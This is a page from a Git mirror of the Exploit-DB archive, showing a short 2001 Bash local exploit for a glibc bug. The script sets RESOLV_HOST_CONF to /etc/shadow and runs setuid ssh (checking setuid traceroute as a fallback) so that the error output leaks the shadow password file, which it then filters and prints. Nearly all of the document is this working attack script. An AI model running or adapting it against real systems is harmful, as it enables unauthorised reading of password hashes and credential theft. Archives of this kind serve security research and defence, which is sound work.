bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/258.sh
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
1,010 B
Bash
Executable file
Raw Permalink Blame History

# Charles Stevenson <csteven@newhope.terraplex.com>
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)
# This exploits is for glibc >= 2.1.9x.
# (****krochos@linuxmail.org****)
# Edit this if you have a problem with path
ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow # File to read
###############################################################################
echo "$ssh"
echo "[*] Checking permisions..."
if [ ! -u $ssh ]; then
echo "$ssh is NOT setuid on this system or does not exist at all!"
if [ ! -u $traceroute ]; then
echo "$traceroute is NOT setuid on this system or does not exist at all!"
exit 0
fi
fi
export RESOLV_HOST_CONF=$FILE
echo "[*] Glibc bug found by Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>"
echo "[*] krochos@linuxmail.org"
sleep 1
echo "[*] export RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '
# milw0rm.com [2001-01-25]
Reference in a new issue View git blame Copy permalink